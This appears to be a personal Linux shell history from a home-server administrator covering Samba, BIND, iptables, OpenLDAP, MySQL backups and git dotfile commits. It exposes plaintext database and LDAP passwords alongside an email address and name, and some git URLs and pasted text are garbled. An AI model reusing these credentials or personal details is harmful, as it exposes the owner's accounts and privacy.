/tmp/ +sudo su - +s +git pull +git sync +git status +less README.md +l. +less .git/HEAD +less .git/config +less conky/README.md +mv conky conky.old +mkdir conky +git init +git clones/conky/releases/latest +git clones/conky/ +l +l. +l. +less README. +less README.md +less README.cmake +mkdir build +cmake ../ +audo apt-get install cmake +sudo apt-get install cmake +sudo apt-get update +df -k . +sudo apt-get update +apt-cache search cmake +sudo apt-get install cmake +cmake ../ +ls .. +less ../CMakeLists.txt +make +sudo make +less ../../README.cmake +rm -rf build +sudo rm -rf build +sudo su - +ls cmake/ +la +h|grep git +git clones/conky/ +git clones/conky +rm -rf conky +git clones/conky/ +less README.md +less Installation.md +sudo apt-get install libtolua-dev libtolua++5.1-dev libx11-dev libxft-dev libxdamage-dev libncurses5-dev libxinerama-dev +sudo su - +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +vim conky.conf +pkill -1 conky +vim conky.conf +pkill -1 conky +sudo su - +sudo systemctl status systemd.logind.service +sudo systemctl status systemd-logind.service +sudo systemctl restart systemd-logind.service +ps aux|grep console +sudo systemctl status console-setup.service +sudo systemctl status console-shell.service +sudo systemctl stop console-shell.service +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +man apt-get +sudo apt-get upgrade --ignore-hold +sudo pkill -9 xscreensaver +ps aux | grep screen +sudo pkill -9 screensaver +ps aux | grep screen +kill -9 2334 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo apt-get update +sudo apt-get upgrade +sudo systemctl restart smbd.service +ls /etc/samba/ +ls /etc/samba/ -a +less /etc/samba/smbusers +less /etc/samba/usermap.cfg +ls /etc/samba/ -a +less /etc/samba/lmhosts +ls /etc/samba/ -a +sudo su - +sudo su - +ls /etc/samba/ +ls /etc/samba/tls/ +sudo ifup eth0 +loh +log +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo apt-get install purple-facebook +sudo apt-cache search pidgin +sudo apt-cache search facebook +sudo apt-cache search facebook|less +sudo apt-get install account-plugin-facebook +pidgin --version +mkdir purple-facebook +git cloneski/purple-facebook.git +rm rf purple-facebook/ +rm -rf purple-facebook/ +git cloneski/purple-facebook.git +./autogen.sh +sudo apt-cache search mercurial +sudo apt-get install mercurial mercurial-git +./autogen.sh +sudo apt-get install autoconf automake +sudo apt-get install libtool +sudo apt-get install libglib2.0-dev libjson-glib-dev libpurple-dev +./autogen.sh +make +sudo make install +sudo pkill -9 pidgin +cat /etc/hosts +mkdir funyahoo +git clonesplus +rm -rf funyahoo/ +git clonesplus +less README.md +make +sudo make install +less Makefile +ls /usr/lib/purple-2/ +sudo mv /usr/lib/purple-2/libyahoo-plusplus.so /tmp/ +sudo iptables-restore < /etc/iptables/rules.v4 +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +ls PDF/ +mv PDF/Resume.pdf Documents/Resume/ +sudo apt-get update +sudo apt-get upgrade +sudo dselect -l|grep firefox +sudo su - +sudo less /var/log/syslog +log +sudo tail -f /var/log/samba/reliant.log +smbd --version +sudo su - +traceroute +traceroute +traceroute +nslookup clock.xmission.om +nslookup clock.xmission.com +traceroute +pkill -9 firefox +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo apt-get update +sudo apt-get upgrade +pkill -1 kodi +;p +sudo ifup eth0 +. +log +sudo iptables-restore < /etc/iptables/rules.v4 +ls /boot/ +ls /boot/grub/ +ls /boot/grub/x86_64-efi/ +ls -lg +ls -lh +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo ifup eth0 +log +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifdown eth0 +;; +chmod 777 studeo.vmoptions +chmod 0644 studeo.vmoptions +chmod 1644 studeo.vmoptions +chmod 4644 studeo.vmoptions +ll .. +man ls +mkdir stuff +rmdir stuff +less directory.py +less whatsmyip.pl +less wiload.sh +iwlist +iwlist scanning +iwlist scanning wlan0 +iwlist --help +iwlist ap +iwlist -a +man iwlist +iwlist wlan0 scan +iwlist wlan0 scanning +man iwlist +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo iptables -L +wiload.sh +sudo ifdown eth0 +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo vim /etc/hosts +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo su - +wiload.sh +ls Public/ +ls -ltr Public/ +sudo updatedb& +ls /dev|grep con +dmesg +viduso +visudo +sudo visudo +lp kodi_crashlog-20180208_143757.log +ll /dev +cat /dev/network_throughput +sudo cat /dev/network_throughput +alias +man bash +\ls -l +pico +ll / +touch stuff +rm stuff +rm kodi_crashlog-20180214_175357.log +cat kodi_crashlog-20180208_143757.log +cat kodi_crashlog-20180208_143757.log | more +man bash +man less +less kodi_crashlog-20180208_143757.log +man bash +alias +ls -l +man ls +info ls +man xterm +man eterm +man -k term +l. +vim .bashr +vim .bashrc +la +less .profile +less .bash_profile +rm .profile +ln -sn .bash_profile .profile +la +less .xinputrc +la +less .xscreensaver +la +less .dircolors +less /etc/DIRCOLORS +git status|less +git add .bash_history .kodi/userdata/guisettings.xml .profile .viminfo +git commit +git push +l. +sudo su - +su - +sudo su - +sudo updatedb & +locate .* +locate .*~ +locate *~ +for file in `locate *~`;do sudo rm -f $file;done +sudo updatedb & +locate *~ +rm Documents/Torrent\ Magnetic\ Links~ +sudo updatedb & +locate *~ +l. +less colors/ +ls colors/ +less .vimrc +kk +chmod 0755 studeo.vmoptions +ls P +ls PDF/ +w +ls /tmp/ +;p +links predict protocol +links google.com +sudo apt-cache search predict +sudo apt-cache search predict|less +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install gpredict +sudo apt-get clean autoclean +sudo su - +less /etc/services +sudo systemctl reboot +pkill -1 kodi +sudo nmap -sT +sudo nmap -Pn +sudo su - +sudo apt-get install -y python3-venv +python3 -m venv mine +mkdir env +python3 -m venv mine +la +la +less pyvenv.cfg +awk '{ print "# ";print; }' /etc/fail2ban/jail.conf | tee /etc/fail2ban/jail.local.bak +sudo su - +sudo apt-get update +sudo apt-get upgrade +sudo systemctl poweroff +vim Documents/router +sudo su - +sudo ifdown eth0 +sudo ifconfig eth0 down +wiload.sh +sudo ifup eth0 +git config local +git config --get-all +git config -e +git config --system add color.status +git config --system --add color.status +git config --system --add color.status true +git config --global --add color.status true +git -e +git config -e +git config --local -e +git config --global -e +git config --local -e +git config --local -e user.email bljohnston@gmail.com +git config --local --add user.email bljohnston@gmail.com +git config --local --add user.name thatonegi +git config --local -e +git config --global -e +git config --local --add color.ui auto +git config --local --add color.status auto +git config --global -e +git config --local -e +which firefox +ls /opt/firefox/ +ls /opt/firefox/browser/ +git config --local --add web.browser /opt/firefox/firefox +git config --local -e +git config --global --add web.browser /opt/firefox/firefox +git config --global -e +git status +ls .git +less .git/config +ls .git +sudo updatedb +which iptables +less /etc/init.d/avahi-daemon +s +mv *.pdf Documents/ +mv Playlist\ 1.xspf Documents/ +mv studeo.vmoptions Documents/ +rm 2-nic-firewall.fwb +mv idea.properties Documents/ +rm nohup.out +mv snmp.conf Documents/ +mv biglist.p2p .biglist.p2p +less .biglist.p2p +mv exodus.zip Downloads/ +git status +git status|less +git add .biglist.p2p .bash_history .kodi/userdata/guisettings.xml .viminfo +git commit +git push +git --help +git config +git config -j +git config -l +git config --get-all +git config --local --get-all +git config --get-all keys +git config --get-all +man git config +less .gitconfig +man gitconfig +man git config +sudo iptables -L +h|grep Z +sudo su - +la +sudo updatedb & +locate *~ +for file in `locate *~`;do echo $file;done +for file in `locate *~`;do rm $file;done +for file in `locate *~`;do sudon rm -f $file;done +for file in `locate *~`;do sudo rm -f $file;done +sudo updatedb +locate *~ +l. +sudo rm .login.defs.swp +la +l. +l. +l. +less skeleton +l. +l. +l. +l. -R +less interfaces +nslookup www.cnn.com +nslookup www.cnn.com +nslookup www.cnn.com +nslookup cnn.com +nslookup www.cnn.com +nslookup cnn.com localhost +sudo systemctl bind9.service restart +sudo systemctl restart bind9.service +nslookup cnn.com localhost +nslookup cnn.com +nslookup cnn.com localhost +nslookup cnn.com +nslookup xmission.com +systemctl status bind9 +l. +less named.conf +less named.conf.local +less named.conf.options +less named.conf.default-zones +less named.conf +less named.conf.options +less named.conf.local +less zones.rfc1918 +vim zones.rfc1918 +less db.empty +less named.conf +ls named.conf* +vim named.conf.options +sudo vim named.conf.options +sudo systemctl restart bind9.service +nslookup cnn.com +sudo su - +nslookup cnn.com +cat /etc/resolv.conf +sudo netstat -plant +sudo iptables -L +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +nslookup cnn.com localhost +which tcpdump +man tcpdump +which wireshark +sudo /usr/bin/wireshark +wiload.sh +loh +log +sudo dpkg --reconfigure bind9 +man dpkg +clea +rclear +vim .bashrc +git status +dmesg +ps aux +ps aux|less +ps aux|grep evolut +pkill -QUIT evolution +ps aux|grep evolut +ps aux|less +sudo vim /etc/hosts +sudo systemctl poweroff +nslookup clock.xmission.com +cat /etc/resolv.conf +dig clock.xmission.com +hostname +cat /etc/hosts +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +route +sudo iptables-L +sudo iptables -L +sudo iptables -t nat -L +sudo sysctl -p +sudo ifdown eth0 +sudo ifup eth0 +sudo vim ath9k.conf +less iwlwifi.conf +less dkms.conf +;wq +ls +rm ath9k.conf~ +sudo rm ath9k.conf~ +l. +sudo rm .ath9k.conf.un~ +less mlx4.conf +less vmwgfx-fbdev.conf +lsmod +sudo systemctl list-unit-files +sudo systemctl +man systemctl +sudo systemctl status --all +man systemctl +sudo systemctl +sudo vim modules +ls /etc/modprobe.d/ +sudo vim /etc/modprobe.d/ath9k.conf +modinfo ath0k +modinfo ath9k +modinfo mac80211 +modinfo ath9k +modinfo ath9k_hw +modinfo ath9k_common +modinfo ath9k +modinfo cfg80211 +modinfo ath +modinfo ath9k +modinfo mac80211 +modinfo cfg80211 +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo ifup eth0 +dmesg +log +sudo ifup eth0 +pkill -QUIT evolution +log +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo systemctl restart +sudo systemctl reboot +sudo ifdown eth0 +sudo ifup eth0 +route +nslookup cnn.com +sudo sysctl -p +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +pkill -QUIT evolution +ps aux|less +wiload.sh +sudo sysctl -p +sudo ifdown eth0 +sudo ifconfif eth0 s\down +sudo ifconfig eth0 s\down +sudo ifconfig eth0 down +wiload.sh +sudo ifup eth0 +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +mysql -u bjohnston -p +mysqldump -u 'bjohnton@localhost' -p 'bljn1285' metadata +mysqldump -u 'bjohnton@localhost' -p metadata +mysqldump -u 'bjohnton'@'localhost' -p metadata +mysqldump -u 'bjohnton' -p metadata +mysqldump -u 'root' -p metadata +mysqldump -u 'root' -p metadata > metadata.sql +lesss metadata.sql +less metadata.sql +mysql -u bjohnston -p +mysqldump -u 'root' -p MyMusic52 > mymusic32.sql +mysqldump -u 'root' -p MyVideos93 > MyVideos93.sql +ls -lh +ls Backups/ +mkdir Backups/mysql +gzip *.sql +mv *.sql.gz Backups/mysql/ +less Backups/ +git add Backups/mysql/ +git add Backups/mysql/metadata.sql.gz +git add Backups/mysql/mymusic32.sql.gz +git add Backups/mysql/MyVideos93.sql.gz +git status +git status|less +git add .bash_history .kodi/userdata/guisettings.xml .mysql_history .viminfo +git commit +git push +sudo chown -R bjohnston:bjohnston nmap/ +mysql -u bjohnston -p +celar +la +l. +sudo updatedb +locate *~ +for file in `*~`;do echo $file;done +for file in `locate *~`;do echo $file;done +for file in `locate *~`;do rm -f $file;done +for file in `locate *~`;do sudo rm -f $file;done +sudo updatedb +man modem-manager +man ModemManager +sudo apt-get remove --purge modemmanager +sudo ifdown eth0 +sudo ifconfig eth0 down +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +wiload.sh +sudo ifup egth0 +sudo ifup eth0 +log +sudo systemctl poweroff +pkill -QUIT evolution +ps aux|less +dmesg +sudo apt-get update +sudo apt-get upgrad +sudo dpkg -l slapd +sudo dpkg -l | grep slapd +sudo apt-get install slapd ldap-utils +sudo dpkg-reconfigure slapd +ldapwhoami -H ldap:// -x +sudo apt-get install phpldapadmin +dmesg +ps aux|less +rm *.log +ls Public/ +rm Public/linuxmint-18.3-cinnamon-64bit.iso +df -k . +la +less mine/ +ls mine/ +ls env/ +celar +sudo vim /etc/phpldapadmin/config.php +sudo vim /etc/hosts +locate ldif +zcat samba.ldif.gz |less +sudo gzip -d samba.ldif.gz +ls -l +man ldapadd +qq +q +sudo gzip samba.ldif +sudo gzip -d samba.ldif.gz +ldapadd -x -D "cn=admin,dc=kodyboy,dc=com" -w letmein -H ldap:// -f samba.ldif +sudo ldapadd -x -D "cn=admin,dc=kodyboy,dc=com" -w letmein -H ldap:// -f samba.ldif +gzip -d samba.ldif.gz +sudo gzip -d samba.ldif.gz +ldapadd -x -D "cn=admin,dc=kodyboy,dc=com" -w letmein -H ldap:// -f samba.ldif +ls |grep ldap +sudo su - +ps aux|grep slap +ls /etc/ldap/slapd.d/ +/usr/sbin/slapd --version +/usr/sbin/slapd -V +sudo ifconfig eth0 down +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth9 +sudo ifup eth0 +smbd -v +smbd -V +sudo su - +ls /var/log/ +sudo touch /var/log/btmp +ls -ltr /var/log/ +lasb +lastb +sudo lastb +last +sudo lastb +s +vim export.ldif +sudo su - +man smbldap-config +vim .ldaprc +la +l. +rm ..ldaprc.un~ +sudo su - +sudo apt-cache search ldapscript +sudo apt-get install ldapscripts +l. +less ldapadduser.template.sample +less ldapaddmachine.template.sample +less ldapaddgroup.template.sample +l. +l. +zcat README.gz |less +ls /usr/share/ldapscripts/ +ls /usr/share/n web-based management tool. What is OpenLDAP. OpenLDAP is an open-source and fast directory server that provides network client with directory ... +ls /usr/share/ldapscripts/ +ls /usr/share/doc/ldap-utils/ +ls /usr/share/ldap-utils/ +ls /usr/share/ +ls /usr/share/slapd/ +net getlocalsid +sudo net getlocalsid +man net +net registery enumerate +net registry enumerate +sudo net registry enumerate +sudo net registry enumerate "HKLM? +sudo net registry enumerate "HKLM" +sudo net registry enumerate "HKLM\Software" +sudo net registry enumerate "HKLM\Software\Microsoft" +man net +sudo net registry enumerate_recursive "HKLM\Software\Microsoft" +sudo net registry enumerate_recursive "HKLM" +sudo su +sudo su - +ls ltr +ls -ltr +unzip ../Downloads/das-project-svn-7-trunk.zip +ls schemas/ +ls ldap/ +ls apple/ +less Makefile +la +ls -lttr +h|grep ldif +sudo su - +ls -ltr +sudo ldapadd -Y EXTERNAL -H ldapi:// -f apple_auxillary.ldif +sudo ldapadd -Y EXTERNAL -H ldapi:// -f apple.ldif +sudo su - +sudo ldapadd -Y EXTERNAL -H ldapi:/// -f apple.ldif +vim apple.ldif +sudo su - +less export.ldif +less apple.ldif +less -S apple.ldif +less apple.schema +cap apple.ldif +cat apple.ldif +echo $(cat apple.ldif) > new-apple.ldif +vim new-apple.ldif +less apple.ldif +gedit +sudo apt-get install gedit +vim apple.ldif +less -S apple.ldif +sudo ldapadd -Y EXTERNAL -H ldapi:// -f apple.ldif +less -S apple.ldif +vim apple.schema +vim apple.ldif +sudo ldapadd -Y EXTERNAL -H ldapi:// -f apple.ldif +vim apple.ldif +sudo ldapadd -Y EXTERNAL -H ldapi:/// -f apple.ldif +vim apple.ldif +less -S apple.ldif +sudo ldapadd -Y EXTERNAL -Hvvv ldapi:/// -f apple.ldif +sudo ldapadd -Y EXTERNAL -Hv ldapi:/// -f apple.ldif +sudo ldapadd -Y EXTERNAL -H -v ldapi:/// -f apple.ldif +sudo ldapadd -Y -v EXTERNAL -H ldapi:/// -f apple.ldif +sudo ldapadd -v -Y EXTERNAL -H ldapi:/// -f apple.ldif +less -S apple.ldif +sudo ldapadd -v-v -Y EXTERNAL -H ldapi:/// -f apple.ldif +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f apple.ldif +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f apple.ldif|less +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f apple.ldif|less -Sq +vim apple.ldif +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f apple.ldif|less +sudo su- +sudo su - +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +pkill -9 pidgin +celar +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +la +ls-ltr +ls -ltr +mv apple\(1\).ldif apple1.ldif +ls -ltr +vim apple1.ldif +file Brett\ Johnston.pgp +less Brett\ Johnston.pgp +celar +gpg --armor --export bljohnston@gmail.com +gpg --import armor Brett\ Johnston.pgp +gpg --import --armor Brett\ Johnston.pgp +gpg --armor --export Brett\ Johnston.pgp +ls openpgp-revocs.d/ +ls private-keys-v1.d/ +gpg --list-keys +gpg --armor --export bljohnston@gmail.com +ls .ssh/ +ll .ssh/ +less .ssh/id_rsa.pub +less .ssh/id_rsa +man ssh-keys +man ssh-keyscan +man ssh-keygen +ssh-keygen -lv -f .ssh/id_rsa +ssh-keygen -Elv -f .ssh/id_rsa +ssh-keygen -E SHA256 -lv -f .ssh/id_rsa +ssh-keygen -E md5 -lv -f .ssh/id_rsa +mv Brett\ Johnston.pgp .gnupg/ +la +git status +git status|less +git add .gitconfig .bash_history .mysql_history .viminfo .ldaprc +git status|less +git commit +git push +wiload.sh +sudo ifdown eth0 +cear +sudo ifup eth0 +The server at www.nailedtothex.org is taking too long to respond. +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +sudo iptables -t nat -L +h|dump +h|grep dump +mysqldump -u 'root' --password='letmein' metadata | gzip > metadata.sql.gz +SCHEMAS="MyMusic52 MyVideos93 alluc metadata cacti" +BDIR=/home/bjohnston/Backups/mysql +mysqldump -u 'root' --password='letmein' metadata | gzip > metadata.tmp.sql.gz +file metadata.tmp.sql.gz +rm metadata.tmp.sql.gz +which gzip +sudo su - +vim dbback.sh +which mysqldump +man mysqldump +mysql -u bjohnston +bljn1285 +mysql -u bjohnston -p +man date +man mysqldump +which chown +man mysqldump +man date +man mysqldump +ls ../mysql-client-5.7/ +ls ../mysql-client-core-5.7/ +ls ../mysql-server +ls ../mysql-server-5.7/ +ls ../mysql-server-5.7/examples/ +ls ../mysql-server-core-5.7/ +ls english/ +ls ../mysql-common/ +less mysql_security_commands.sql +man mysqldump +mysql_config_editor set --login-path=root --host=localhost --port=3306 --user=root --password=letmein +mysql_config_editor set --login-path=root --host=localhost --port=3306 --user=root --password +mysql_config_editor --print +mysql_config_editor print +mysql_config_editor print --all +mysql_config_editor set --login-path=bjohnston --host=localhost --port=3306 --user=bjohnston --password +mysql_config_editor print --all +kall +pkill -QUIT evolution +less getopt-parse.bash +less .gitconfig +less .git/config +./dbback.sh +vim dbback.sh +./dbback.sh +vim dbback.sh +man getopt +apt-cache search getopt +sudo apt-get install opt node-posix-getopt +ls /usr/share/ +ls /usr/share/doc/opt +less testopt.c +man getokpt +man getopt +man bash +man mysqldump +vim dbback.sh +./dbback.sh +vim dbback.sh +./dbback.sh +vim dbback.sh +./dbback.sh +\rm SCHEMAS-022118-0* +ls -ltr +zcat metadata-022118-071934PM.sql.gz |less +la +la +l. +rm dbback.sh~ .dbback.sh.un~ +l. +git add bin/dbback.sh +git status +git status|less +git add .bash_history .mysql_history .viminfo +git commit +git push +scp Backups/mysql/MyMusic52-022118-071930PM.sql.gz thatonegi@github.com/thatonegi/home.git +which scp +ls Downloads/ +ll Downloads/ +scp Downloads/exodus.zip bjohnston@localhost:/tmp +cat authorized_keys +cat id_rsa.pub >> authorized_keys +cat authorized_keys +scp Downloads/exodus.zip bjohnston@localhost:/tmp +scp Backups/mysql/MyMusic52-022118-071930PM.sql.gz thatonegi@github.com/thatonegi/home.git +ls /usr/share/doc/git +ls /usr/share/doc/git/contrib/ +less gnome-keyring/ +ls gnome-keyring/ +ls netrc/ +less netrc/git-credential-netrc +less git-commit.sh +ls builtin-fetch--tool.c +less README +ls hooks +ls workdir/ +ls git-shell-commands/ +less README +lcar +ls templates/ +ls templates/info/ +ls contrib/ +ls contrib/hooks/ +ls ../git +less index.cgi +less options.skel +less gpg-conf.skel +celar +rm kodi_crashlog-20180221_172757.log +l. +git status +git add bin/wiload.sh +git add Backups/mysql/ +git add Backups/mysql/*.gz +git commit +git push +git status|less +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup etho +sudo ifup eth0 +dmesg +sudo iptables-restore < /etc/iptables/rules.v4 +pkill -QUIT evolution +sudo systemctl stop smbd +sudo systemctl stop nmbd +ps aux|less +sudo systemctl stop named +sudo systemctl stop bine9 +sudo systemctl stop bind9 +ps aux|less +sudo systemctl stop apache2 +ps aux|less +to[ +top +route +wiload.sh +sudo ifdown eth0 +sudo ifconfg eth0 down +sudo ifconfig eth0 down +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +nslookup clock.xmission.com +w +sudo apt-get update +sudo apt-get upgrade +dmesg +ls Backups/mysql/ +ls -l Backups/mysql/ +crontab -e +crontab -l +crontab -e +sudo systemctl shutdown +sudo systemctl poweroff +log +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +route +pkill -QUIT evolution +sudo systemctl stop apache2 +sudo systemctl stop nmbd +sudo systemctl stop smbd +sudo systemctl stop avahi +ps aux|less +dmesg +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +wiload.sh +sudo ifdown eth0 +sudo ifconfig eth0 down +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo ifconfig eth0 down +less bin/wiload.sh +sudo modprobe -r ath9k;sleep 5;sudo modprobe ath9k +sudo systemctl stop network-manager ; sleep 5;sudo systemctl restart network-manager +sudo ifconfig eth0 down +sudo ifdown eth0 +sudo ifup eth0 +route +sudo iptables-restore < /etc/iptables/rules.v4 +sudo systemctl stop smbd +sudo systemctl stop nmbd +sudo systemctl stop bind9 +ps aux|less +sudo systemctl stop snmpd +sudo systemctl stop apache2 +ps aux|less +tp +top +ps aux|less +git status +man system-config-samba +ls /usr/share/doc/system-config-samba/index.html +;s +ll|less +ls C/ +ls C/images/ +ls xml/ +ls examples/ +less examples/README.irqstat +ls examples/ +ls xml/ +ls | grep sys +ls system-config-printer-udev/ +ls system-tools-backends/ +less system-tools-backends/README +less system-tools-backends/ +ls system-tools-backends/ +ls ../system-tools-backends-2.0/ +ls ../system-tools-backends-2.0/files/ +ls ../system-tools-backends-2.0/scripts/ +ls ../system-tools-backends-2.0/scripts/Init/ +ls ../system-tools-backends-2.0/scripts/Network/ +ls ../system-tools-backends-2.0/scripts/Shares/ +ls ../system-tools-backends-2.0/scripts/Utils/ +ls |grep -i \^s.* +ls samba +ls samba/examples/ +ls samba/examples/LDAP/ +less samba/examples/LDAP/README +ls samba/examples/LDAP/ +less samba/examples/LDAP/get_next_oid +ls samba/examples/LDAP/ +ls samba/examples/ +ls samba/examples/logon/ +ls samba/examples/logon/ntlogon/ +ls samba/examples/printing/ +less samba/examples/printing/readme.prtpub +ls samba/examples/printing/ +less samba/examples/printing/smbprint.sysv +ls samba/examples/printing/ +ls samba/examples/ +ls samba/ +ls samba-common +ls samba-common/examples/ +ls samba-common-bin/ +ls samba-libs/ +ls ../samba/setup/ +ls ../samba/setup/ad-schema/ +ls ../samba/setup/ +ls ../samba/setup/display-specifiers/ +ls ../samba/setup/provision_basedn.ldif +less ../samba/setup/provision_basedn.ldif +less ../samba/panic-action +ls ../samba/ +less ../samba/setoption.py +ls ../samba/ +less ../samba/addshare.py +ls samba +la +ls set +ls setup/ +less setup/modules.conf +ls system-config-samba/ +s +lss system-config-samba.py +less system-config-samba.py +cp /etc/samba/smb.conf /home/bjohnston/Downloads/ +pkill -1 system-config-sama +pkill -1 system-config-sa +pkill -1 system-config-samba +pkill -QUIT system-config-samba +pkill -9 system-config-samba +sudo pkill -9 system-config-samba +ps aux|grep sam +sudo kill -QUIT 11353 +sudo kill -9 11353 +ll /etc/samba/ +less /etc/samba/dhcp.conf +:q +ll /etc/samba/ +diff /etc/smb.conf /etc/samba/smb.conf.old.gadmin-samba-0.3.2 +diff /etc/samba/smb.conf /etc/samba/smb.conf.old.gadmin-samba-0.3.2 +ls ../ldapscripts/ +less ../ldapscripts/runtime +ls slapd/ +less slapd/ldiftopasswd +ls +ls vim-scripts/ +ls vim-scripts/colors/ +la +ls plugin/ +l. +ls syntax/ +ls macros/ +ls indent/ +ls doc/ +ls autoload/ +ls autoload/omni/ +ls autoload/omni/common/ +ls after/ +ls vimplate-templates/ +ls syntax/ +ls sokoban-levels/ +ls plugin/ +ls vim +ls vim/vimfiles +ls vim/registry/ +ls vim/addons/ +ls vim/addons/syntax/ +ls vim/addons/plugin/ +ls vim/addons/ftdetect/ +less vim/addons/syntax/conkyrc.vim +l. +less vimrc +ls vim74/ +ls vim74/colors/ +ls vim74/autoload/ +ls vim74/autoload/xml +less vimrc +ls registry/ +ls ubuntu-drivers-common/ +ls ubuntu-drivers-common/quirks/ +ls ubuntu-drivers-common/detect/ +ls ubuntu-drivers-common/ +less ubuntu-drivers-common/fake-devices-wrapper +ls system-tools-backends-2.0/ +ls system-tools-backends-2.0/scripts/ +ls pkgconfig/ +man pkgconfig +man -k package +man -k config +man -k config|lwaa +man -k config|less +man wpa_supplicant.conf +man wpa_supplicant +ls config/ +ls htdocs/ +ls lib/ +ls queries/ +ls tools/ +ls doc +ls templates +sudo ls templates +ls locale/ +ls lib/ +ls lang/ +ls htdocs/ +ls hooks/ +ls hooks/functions/ +ls hooks/classes/ +ls config/ +less config/config.php +sudo less config/config.php +sudo systemctl start apache2 +sudo vim /etc/hosts +wiload.sh +log +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f /etc/ldap/slapd.d/apple.ldif|less +ls /etc/ldap/slapd.d/ +ls /etc/screenrc +ls /etc/ldap/schema/ +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f /etc/ldap/schema/apple.ldif|less +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f /etc/ldap/schema/apple.ldif >> /tmp/error +less /tmp/error +sudo ldapadd -vv -Y EXTERNAL -H ldapi:// -f /etc/ldap/schema/apple.ldif >> /tmp/error2 +vim /etc/ldap/schema/apple.ldif +less -S /etc/ldap/schema/apple.ldif +sudo ldapadd -vv -Y EXTERNAL -H ldapi:/// -f /etc/ldap/schema/apple.ldif >> /tmp/error/SYNTAX +less -S /etc/ldap/schema/apple.ldif +ls -ltr +rm apple.ldif~ ~ +l. +rm .apple.ldif.un~ +sudo updatedb & +less apple1.ldif +echo $(cat apple1.ldif) +echo $(cat apple1.ldif)>> apple.ldif +vim apple.ldif +less -S apple.ldif +less apple.ldif +sed 's/\)\ olcA/\)\ +olcA/g' +sed 's/)\ olcA/)\ +olcA/g' +cat apple.ldif|sed 's/)\ olcA/)\ +olcA/g' +cat apple.ldif|sed 's/)/) +cat apple.ldif|sed 's/)/) +/g' +cat apple.ldif|sed 's/)/) +/g' >>newapple.ldif +vim newapple.ldif +rm *~ +rm .*~ +l. +mv *.pdf ../Documents/ +mkdir ../Pictures/new +mv *.jpg ../Pictures/new/ +mv bookmarks-2017-04-08.json ../Documents/ +celar +s +ls tmp/ +ls bin +sudo updatedb +locate *~ +for file in `locate *~`;do sudo rm $file;done +sudo updatedb +locate *~ +locate lck +locate lock +locate lock|less +unlock +man -k lock +man dotlockfile +locate lock +locate lock|less +ls /etc/.pwd.lock -l +sudo dotlockfile -r /etc/.pwd.lock +sudo su - +s +la +ls .. +ls system/ +dotlockfile -u system/port.lock +ls system/ +ls config/ +dotlockfile -u config/port.lock +ls config/ +rm config/user.token +locate .lock |grep bjohnston|less +la +ls jetbrains/ +dotlockfile -u .user.lock.bjohnston +dotlockfile -u .userRootModFile.bjohnston +la +la +sudo updatedb +locate .lock |grep bjohnston +dotlockfile -u /home/bjohnston/Android/Sdk/tools/lib/monitor-x86/p2/org.eclipse.equinox.p2.engine/profileRegistry/DefaultProfile.profile/.lock +dotlockfile -u /home/bjohnston/Android/Sdk/tools/lib/monitor-x86_64/p2/org.eclipse.equinox.p2.engine/profileRegistry/DefaultProfile.profile/.lock +sudo updatedb +locate .lock |grep bjohnston +dotlockfile -u /home/bjohnston/git-repos/configs/.config/libreoffice/4/.lock +dotlockfile -u /home/bjohnston/git-repos/google/mcm/docs/Gemfile.lock +sudo updatedb +locate .lock |grep bjohnston +ls _locks/ +ls -l _locks/ +la +for lock in `ls`;do dotlockfile -u $lock;done +la +la +sudo updatedb& +locate .lock |grep bjohnston +locate .lock +sudo systemctl poweroff +less apple1.ldif +less /etc/ldap/schema/apple.schema +less /etc/ldap/schema/apple.ldif +man sed +ls -l +ls -ltr +less apple.ldif +ls -ltr +less apple1.ldif +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +sudo sysctl -p +la +ls .. +ls /tmp/ +sudo updatedb +sudo apt-get clean autoclean +man apt-config +man apt.conf +ls /etc/apt +conky& +vim .bashrc +ls /etc/apt/apt.conf +sudo apt-config dump +ls 